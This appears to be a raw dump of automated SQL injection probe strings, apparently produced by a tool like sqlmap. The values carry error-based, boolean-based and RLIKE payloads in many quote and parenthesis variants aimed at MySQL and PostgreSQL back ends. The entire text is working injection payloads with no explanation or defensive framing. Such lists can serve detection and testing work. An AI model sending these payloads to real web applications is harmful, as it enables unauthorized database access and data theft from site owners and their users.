wYxD' OR (SELECT 2762 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(2762=2762,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hYpa'='hYpa
wYxD')) OR (SELECT 2762 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(2762=2762,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (('fTCq'='fTCq
wYxD AND (SELECT 4783 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(4783=4783,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- drYq
wYxD)) AND (SELECT 4783 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(4783=4783,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((4428=4428
wYxD) AND (SELECT 4783 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(4783=4783,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (5387=5387
wYxD" AND (SELECT 4783 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(4783=4783,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "HigV"="HigV
wYxD") AND (SELECT 4783 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(4783=4783,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("HbqK"="HbqK
wYxD%' AND (SELECT 4783 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(4783=4783,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'cbBC%'='cbBC
wYxD')) AND (SELECT 4783 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(4783=4783,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (('qihj'='qihj
wYxD') AND (SELECT 4783 FROM(SELECT COUNT(*),CONCAT(0x7170787871,(SELECT (ELT(4783=4783,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zjoF'='zjoF
wYxD,(SELECT (CASE WHEN (8004=8004) THEN 1 ELSE 1/(SELECT 0) END))
wYxD,(SELECT (CASE WHEN (6576=1915) THEN 1 ELSE 1/(SELECT 0) END))
wYxD)) AND (SELECT (CASE WHEN (8934=8934) THEN NULL ELSE CAST((CHR(75)||CHR(84)||CHR(81)||CHR(116)) AS NUMERIC) END)) IS NULL AND ((3144=3144
wYxD)) AND (SELECT (CASE WHEN (8646=1500) THEN NULL ELSE CAST((CHR(103)||CHR(113)||CHR(117)||CHR(74)) AS NUMERIC) END)) IS NULL AND ((8333=8333
wYxD) AND (SELECT (CASE WHEN (8934=8934) THEN NULL ELSE CAST((CHR(75)||CHR(84)||CHR(81)||CHR(116)) AS NUMERIC) END)) IS NULL AND (2652=2652
wYxD) AND (SELECT (CASE WHEN (7819=3988) THEN NULL ELSE CAST((CHR(105)||CHR(71)||CHR(100)||CHR(77)) AS NUMERIC) END)) IS NULL AND (8685=8685
wYxD" AND (SELECT (CASE WHEN (8934=8934) THEN NULL ELSE CAST((CHR(75)||CHR(84)||CHR(81)||CHR(116)) AS NUMERIC) END)) IS NULL AND "ssdE"="ssdE
wYxD" AND (SELECT (CASE WHEN (3441=1848) THEN NULL ELSE CAST((CHR(105)||CHR(100)||CHR(113)||CHR(70)) AS NUMERIC) END)) IS NULL AND "Ohtq"="Ohtq
wYxD") AND (SELECT (CASE WHEN (8934=8934) THEN NULL ELSE CAST((CHR(75)||CHR(84)||CHR(81)||CHR(116)) AS NUMERIC) END)) IS NULL AND ("Xypb"="Xypb
wYxD')) AND (SELECT (CASE WHEN (8934=8934) THEN NULL ELSE CAST((CHR(75)||CHR(84)||CHR(81)||CHR(116)) AS NUMERIC) END)) IS NULL AND (('YyFd'='YyFd
wYxD')) AND (SELECT (CASE WHEN (3273=6342) THEN NULL ELSE CAST((CHR(76)||CHR(110)||CHR(103)||CHR(120)) AS NUMERIC) END)) IS NULL AND (('mjnz'='mjnz
wYxD RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END))-- ptYm
wYxD RLIKE (SELECT (CASE WHEN (4072=6094) THEN 0x77597844 ELSE 0x28 END))-- hxqK
wYxD RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END))
wYxD RLIKE (SELECT (CASE WHEN (7425=9794) THEN 0x77597844 ELSE 0x28 END))
wYxD)) RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND ((9540=9540
wYxD)) RLIKE (SELECT (CASE WHEN (8177=9708) THEN 0x77597844 ELSE 0x28 END)) AND ((6273=6273
wYxD) RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND (2020=2020
wYxD) RLIKE (SELECT (CASE WHEN (5528=7159) THEN 0x77597844 ELSE 0x28 END)) AND (6468=6468
wYxD" RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND "pKeb"="pKeb
wYxD" RLIKE (SELECT (CASE WHEN (5421=5779) THEN 0x77597844 ELSE 0x28 END)) AND "BOiG"="BOiG
wYxD") RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND ("WdVl"="WdVl
wYxD") RLIKE (SELECT (CASE WHEN (9063=4752) THEN 0x77597844 ELSE 0x28 END)) AND ("mlCi"="mlCi
wYxD' RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND 'cgWz' LIKE 'cgWz
wYxD' RLIKE (SELECT (CASE WHEN (3000=6734) THEN 0x77597844 ELSE 0x28 END)) AND 'evlz' LIKE 'evlz
wYxD%' RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND 'WiPs%'='WiPs
wYxD%' RLIKE (SELECT (CASE WHEN (4954=1600) THEN 0x77597844 ELSE 0x28 END)) AND 'gtxa%'='gtxa
wYxD') RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND ('aTze' LIKE 'aTze
wYxD') RLIKE (SELECT (CASE WHEN (6297=7817) THEN 0x77597844 ELSE 0x28 END)) AND ('gndw' LIKE 'gndw
wYxD' RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND 'cTCD'='cTCD
wYxD' RLIKE (SELECT (CASE WHEN (3395=8380) THEN 0x77597844 ELSE 0x28 END)) AND 'UFYL'='UFYL
wYxD')) RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND (('kWqX'='kWqX
wYxD')) RLIKE (SELECT (CASE WHEN (2449=8422) THEN 0x77597844 ELSE 0x28 END)) AND (('oeJB'='oeJB
wYxD') RLIKE (SELECT (CASE WHEN (1256=1256) THEN 0x77597844 ELSE 0x28 END)) AND ('fuLy'='fuLy
wYxD') RLIKE (SELECT (CASE WHEN (7138=5357) THEN 0x77597844 ELSE 0x28 END)) AND ('gYAJ'='gYAJ
-1751)) OR 3622=6883-- cqLu
-1928)) OR 3785=3785-- EPma
-2777)) OR 5962=1812-- hPUb
-8389) OR 6625=5420-- WDcR
-6654) OR 3785=3785-- bFuz
-3617) OR 5398=4108-- ngWV
-1187" OR 6537=9654-- kvKG
-9950" OR 3785=3785-- RMHc
-7255" OR 6675=2774-- EEBH
-5907") OR 7502=8301-- YKTG
-6287") OR 3785=3785-- FWOi
-9995") OR 4998=9191-- CYwO
-1772%' OR 6267=1062-- kqDr
-9616%' OR 3785=3785-- xQcD
-8756%' OR 9175=2226-- OorS
-6395' OR 4057=4981-- QqTN
-4381' OR 3785=3785-- oXDp
-6078' OR 3034=7168-- keQO
-6648')) OR 5290=6016-- OhbD
-2439')) OR 3785=3785-- Fide
-4707')) OR 8877=9690-- lNVq
-7740') OR 5014=5387-- VNgb
-2005') OR 3785=3785-- vMkS
-6628') OR 1756=8856-- pHVE
wYxD)) AND 1308=1308-- ACVT
wYxD)) AND 4101=4577-- swgo
wYxD) AND 1308=1308-- flft
wYxD) AND 7408=5842-- ebOL
wYxD" AND 1308=1308-- WyVT
wYxD" AND 2121=8164-- Abwc
wYxD") AND 1308=1308-- FWhy
wYxD") AND 4949=5720-- rVDq
wYxD%' AND 1308=1308-- qayr
wYxD%' AND 4425=8535-- kUSn
wYxD' AND 1308=1308-- Enlz
wYxD' AND 1420=2369-- hksA
wYxD')) AND 1308=1308-- EgXj
wYxD')) AND 3379=9858-- kjQp
wYxD') AND 1308=1308-- BhlG
wYxD') AND 9251=4010-- uriE
-6353 OR 9760=(SELECT (CASE WHEN (9760=9760) THEN 9760 ELSE (SELECT 5711 UNION SELECT 6248) END))-- kUfT
-4700 OR 9529=(SELECT (CASE WHEN (9529=3008) THEN 9529 ELSE (SELECT 3008 UNION SELECT 6132) END))-- XZHo
-9755)) OR 9760=(SELECT (CASE WHEN (9760=9760) THEN 9760 ELSE (SELECT 5711 UNION SELECT 6248) END))-- ctvz
-8535)) OR 2818=(SELECT (CASE WHEN (2818=5750) THEN 2818 ELSE (SELECT 5750 UNION SELECT 6196) END))-- qsua
-6988) OR 9760=(SELECT (CASE WHEN (9760=9760) THEN 9760 ELSE (SELECT 5711 UNION SELECT 6248) END))-- hVRi
-5084) OR 8405=(SELECT (CASE WHEN (8405=6206) THEN 8405 ELSE (SELECT 6206 UNION SELECT 4614) END))-- IXCN
-8371" OR 9760=(SELECT (CASE WHEN (9760=9760) THEN 9760 ELSE (SELECT 5711 UNION SELECT 6248) END))-- tsrI
-9286" OR 2573=(SELECT (CASE WHEN (2573=1560) THEN 2573 ELSE (SELECT 1560 UNION SELECT 8614) END))-- GQHd
-7790") OR 9760=(SELECT (CASE WHEN (9760=9760) THEN 9760 ELSE (SELECT 5711 UNION SELECT 6248) END))-- CpMs
-4069") OR 6636=(SELECT (CASE WHEN (6636=9749) THEN 6636 ELSE (SELECT 9749 UNION SELECT 5843) END))-- qxtr
-6121%' OR 9760=(SELECT (CASE WHEN (9760=9760) THEN 9760 ELSE (SELECT 5711 UNION SELECT 6248) END))-- Khax
-9002%' OR 3385=(SELECT (CASE WHEN (3385=3529) THEN 3385 ELSE (SELECT 3529 UNION SELECT 4370) END))-- iTeO
-5495' OR 9760=(SELECT (CASE WHEN (9760=9760) THEN 9760 ELSE (SELECT 5711 UNION SELECT 6248) END))-- vIeN
-4240' OR 5069=(SELECT (CASE WHEN (5069=8697) THEN 5069 ELSE (SELECT 8697 UNION SELECT 5167) END))-- EZWS
-8555')) OR 9760=(SELECT (CASE WHEN (9760=9760) THEN 9760 ELSE (SELECT 5711 UNION SELECT 6248) END))-- RwIQ
-8408')) OR 5298=(SELECT (CASE WHEN (5298=2015) THEN 5298 ELSE (SELECT 2015 UNION SELECT 2531) END))-- DtlG
-1617') OR 9760=(SELECT (CASE WHEN (9760=9760) THEN 9760 ELSE (SELECT 5711 UNION SELECT 6248) END))-- pSDA
-7370') OR 5453=(SELECT (CASE WHEN (5453=6045) THEN 5453 ELSE (SELECT 6045 UNION SELECT 6939) END))-- gHFD
wYxD AND 8056=(SELECT (CASE WHEN (8056=8056) THEN 8056 ELSE (SELECT 3235 UNION SELECT 2266) END))-- MoOw
wYxD AND 1432=(SELECT (CASE WHEN (1432=2210) THEN 1432 ELSE (SELECT 2210 UNION SELECT 1900) END))-- xzbs
wYxD)) AND 8056=(SELECT (CASE WHEN (8056=8056) THEN 8056 ELSE (SELECT 3235 UNION SELECT 2266) END))-- CNiE
wYxD)) AND 1714=(SELECT (CASE WHEN (1714=1515) THEN 1714 ELSE (SELECT 1515 UNION SELECT 2976) END))-- Uwox
wYxD) AND 8056=(SELECT (CASE WHEN (8056=8056) THEN 8056 ELSE (SELECT 3235 UNION SELECT 2266) END))-- lrVN
wYxD) AND 3111=(SELECT (CASE WHEN (3111=9268) THEN 3111 ELSE (SELECT 9268 UNION SELECT 8537) END))-- Poqg
wYxD" AND 8056=(SELECT (CASE WHEN (8056=8056) THEN 8056 ELSE (SELECT 3235 UNION SELECT 2266) END))-- ZpEg
wYxD" AND 8113=(SELECT (CASE WHEN (8113=2975) THEN 8113 ELSE (SELECT 2975 UNION SELECT 7131) END))-- hLqt
wYxD") AND 8056=(SELECT (CASE WHEN (8056=8056) THEN 8056 ELSE (SELECT 3235 UNION SELECT 2266) END))-- sAvs
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